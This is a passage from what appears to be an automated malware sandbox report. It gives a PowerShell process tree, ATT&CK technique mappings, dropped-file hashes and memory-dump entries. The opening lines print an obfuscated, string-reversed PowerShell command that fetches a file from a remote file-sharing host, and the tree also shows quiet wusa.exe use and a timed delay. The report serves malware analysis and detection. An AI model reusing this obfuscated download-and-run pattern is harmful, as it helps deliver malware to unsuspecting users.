'22%80b6e83148d91b945dc23514175566ee22%=v&daolnwod=ecruos&txt.4202.80.62.dirgni72%72%8-FTUD3%A2%emanelif+B3%22%txt.4202.80.62.dirgni22%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?txt.229551bb218b-7888-d234-e861-36a46a6a/Xkm5Ru8z/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth' , $hzwje , 'true1' ) );};"
    3⤵
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe IzjAQ /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2852
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" IzjAQ /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2744
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ISJWOSR544QTFLZYIJNQ.temp

Filesize
7KB

MD5
44893d7aa983ba0555199eec10394b59

SHA1
3cb6515803f5ab6e287ef30a224b15f1769932ec

SHA256
34f087f2d67be2a7319ef07045c4ebf7fc38f0e5bee97607a5b81018ec6f26ef

SHA512
e1ab89b3744867ca6c2831825afedec111346b9fab98ba7de8b29906c04bde451125a54c1f62006a57adc2f98059ef53d004bedaed30f57a7e974c363b987265

Download Submit
memory/2696-4-0x000007FEF5C7E000-0x000007FEF5C7F000-memory.dmp

Filesize
4KB

Download
memory/2696-5-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/2696-7-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-6-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/2696-8-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-9-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-10-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

Filesize
9.6MB

Download
memory/2696-28-0x000007FEF5C7E000-0x000007FEF5C7F000-memory.dmp

Filesize
4KB

Download
memory/2696-29-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing